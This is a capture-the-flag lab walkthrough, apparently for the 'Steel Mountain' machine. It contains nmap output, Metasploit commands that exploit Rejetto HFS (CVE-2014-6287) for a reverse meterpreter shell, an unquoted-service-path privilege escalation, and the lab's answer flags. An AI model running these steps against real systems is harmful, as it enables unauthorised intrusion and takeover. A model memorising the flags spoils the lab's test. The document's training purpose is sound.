nmap -sS -A 10.10.227.204 -oN recon.nmap
Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-28 14:57 BST
Nmap scan report for ip-10-10-227-204.eu-west-1.compute.internal (10.10.227.204)
Host is up (0.00050s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl Microsoft SChannel TLS
| fingerprint-strings:
| TLSSessionReq:
| i]cW
| \x9bK
| !r|b
| steelmountain0
| 230327134335Z
| 230926134335Z0
| steelmountain0
| Y7;7
| \x18
| S~M>t%
| T}}~
| lJW2
| $0"0
| iBD\x18
| $ejT
|_ Ur^Cg
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2023-03-27T13:43:35
|_Not valid after: 2023-09-26T13:43:35
|_ssl-date: 2023-03-28T13:59:36+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.60%I=7%D=3/28%Time=6422F28B%P=x86_64-pc-linux-gnu%r(TL
SF:SSessionReq,346,"\x16\x03\x03\x03A\x02\0\0M\x03\x03d\"\xf2\x86\r\x9f\x9
SF:3\xefi\]cW\xad\\\x9bK\xae\x01NE\xb6\|vg\xf9\x10\x1a\xf3\x0b\x11\x88s\x2
SF:0\xf2=\0\0\xb1\x91,\x9d\x04\xe6o\xe6\x97\x05\x02c\xfd\(A\xad\xb8\xd8L6\
SF:xad\xeb\xbe-\xb7\x1c\x13\xfc\0/\0\0\x05\xff\x01\0\x01\0\x0b\0\x02\xe8\0
SF:\x02\xe5\0\x02\xe20\x82\x02\xde0\x82\x01\xc6\xa0\x03\x02\x01\x02\x02\x1
SF:0=\|\xaf\xce\x9d\xceY\xb7K\x13\xb9!r\|b\xf70\r\x06\t\*\x86H\x86\xf7\r\x
SF:01\x01\x05\x05\x000\x181\x160\x14\x06\x03U\x04\x03\x13\rsteelmountain0\
SF:x1e\x17\r230327134335Z\x17\r230926134335Z0\x181\x160\x14\x06\x03U\x04\x
SF:03\x13\rsteelmountain0\x82\x01\"0\r\x06\t\*\x86H\x86\xf7\r\x01\x01\x01\
SF:x05\0\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\0\xb5V\x7f\x0f\xfd
SF:\xb6\0\x05\x98\x19\xe0-\xffH\xd3\xd9<\xae2\xf1\]\x0e\xdd\x1a\xde`y\x9e\
SF:x1a\xf8\x92\x88\*\xbfHu\x13B}\x8e\x1b\x9d\x9a\xd8\xda\xa5\x1a\)\x1fE\xc
SF:9\xa6\xca\xdb\xcfua2\xef\x14rg\x9d\xaf\[6\xc4\x9dz\x0e<\xa4<\xe2\xc2\xa
SF:0\xf2\xf2\x16t\xb8>\x0e\x8c/\xc2\xc2\x04Y\x85M\x0b\xae3\xef\xd2\xcb\x95
SF:\)\x12Y7;7\xe6\xf2\xae\\\x18\x93\x8d\x12p\x10\xb7\xd8\xdb\xd6\xb5DX\xa1
SF:\x1c\x05\xe3KV\x1f\xbf\x81\xdc\x9b\xf1\xd4:\x91\x81pd#\xa5\xde\xd7{\xe7
SF:<\x8d:c\xc4\xce\xc01=\x8e\x13U%W\x996\x01\x8e\xc7\xc8\x97b\xd5S~M>t%\x1
SF:6\xd5l\"\x01\xe4\x9f6\xb1\xbdBUm\x80\xafS\xf8\xc32\xf0\xaak\x13\x8cv_`\
SF:x1a\xb6\x20Ex\xab2\xb2NsR\xe2\xfb\x93EL\x14}\xc6\xa5\xd0IR\xad\xd9\x90&
SF:`\xdf\xa1\x04\xa1\xd55;\[\xddT}}~\x0bD\xfblJW2\x9a\xcdV\xed\x92W\xcb\x0
SF:2\x03\x01\0\x01\xa3\$0\"0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08\+\x06\x0
SF:1\x05\x05\x07\x03\x010\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x0400\r\x06
SF:\t\*\x86H\x86\xf7\r\x01\x01\x05\x05\0\x03\x82\x01\x01\0I\xfa\xe4fv\x1d\
SF:xf1\x93\xca\xc4\xadiBD\\\x18\xe8\xae4f\xd7\x15\xd3QV\xfc\x95\x89T\x1b\x
SF:bc\$ejT\xf3\x90\xe2\xa5\xd4\"B\xb9\x16V\xbc\x80\xa9\xc8\xb9I\x9dYf\xcb\
SF:xc2rZ\xf8\xd3DcA\xec\xf6\xc7;\x9dka\xc1\x07-\xab\x7f,\xbd\xdb\x1e\xac\x
SF:13w~\xde\x0e\]\xe6\xf6t\x88\xcf\xa9O\xb5Q\xde\xcas\xc2\x14T\xbbF\x0b\xa
SF:bD\xfa\x17\xbb\xcb\x9d/\0\xb4\x0b\x12\xdf6\xe9\x08\xa0\x8d\x89\xe8\x96\
SF:x11\xaaZ\xbd\xf5I4\x9d\t\xd3e\x8c\xaf\x85UF\xae\xdeM\xd9\x07<\xec\xb1q\
SF:x84t\xb2Q\x20\xe2`\x1d\xfb\xbd\"\x10\xc5h;\xbb\xb1\xfc\xfcUr\^Cg\xfd\xc
SF:9\xd4\x04\x97\*\xb2pb9\xf1\x8f\xc0\xe1\x8c\x0c\x0eg'P\x19\x136\xc0\x032
SF:T\x07\xed}\xcdU\x9f\x0c\x9e\xb3\xbc7\xce\x8f\xd9\x14D\xdbd\x97Ma\x13\xf
SF:d\x1e\x9e\xd9i\xd5\xbe\xa8\xeb\x9f\x86\x11\x8f_\xff\xb5\xbd\xba\xdc\xe8
SF:J\xfb4\.\xa9\xd0\x05Q\x1d\x94%\xed\xb2\x0e\0\0\0");
MAC Address: 02:63:4A:A4:5E:63 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=3/28%OT=80%CT=1%CU=41505%PV=Y%DS=1%DC=D%G=Y%M=02634A%T
OS:M=6422F2CE%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=I%TS=7
OS:)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=RD%II=I%SS=S%TS=7)OPS(O1=M2301NW8ST11%
OS:O2=M2301NW8ST11%O3=M2301NW8NNT11%O4=M2301NW8ST11%O5=M2301NW8ST11%O6=M230
OS:1ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T
OS:=80%W=2000%O=M2301NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
OS:T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=
OS:O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=
OS:Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%
OS:RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%I
OS:PL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:63:4a:a4:5e:63 (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-03-28 14:59:36
|_ start_date: 2023-03-28 14:43:25
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms ip-10-10-227-204.eu-west-1.compute.internal (10.10.227.204)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.48 seconds
There are two webservers running, one on port 80 and the other oner on port 8080.
The other server is being run on port 8080 with HFS 2.3. it has a number of exploits
lets first exploit it with metasploit
use exploit/windows/http/rejetto_hfs_exec
set RPORT 8080
set RHOSTS 10.10.227.204
exploit
And we get a meterpreter shell. Move to the desktop folder and get the user flag
Scan the machine with nmap. What is the other port running a web server on?
8080
Take a look at the other web server. What file server is running?
rejetto http file server
What is the CVE number to exploit this file server?
2014-6287
Use Metasploit to get an initial shell. What is the user flag?
b04763b6fcf51fcd7c13abc7db4fd365
Priv escalation
lets first check msf exploit suggester
use post/multi/recon/local_exploit_suggester
it only found exploit/windows/local/bypassuac_eventvwr which did not work
using reverse meterpreter payload dies if used and we have to chain it with post/windows/manage/migrate
Now upload the malicious file and changer meterpreter to shell, stop the service and then copy the file the same location, start listener at port 4443 and start the service again.
Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?
AdvancedSystemCareService9
What is the root flag?
9af5f314f57607c00fd09803a587db80
Manual Exploitation
Change the ip address within the file to your local ip
Now download the netcat binay and host it on the webserver.
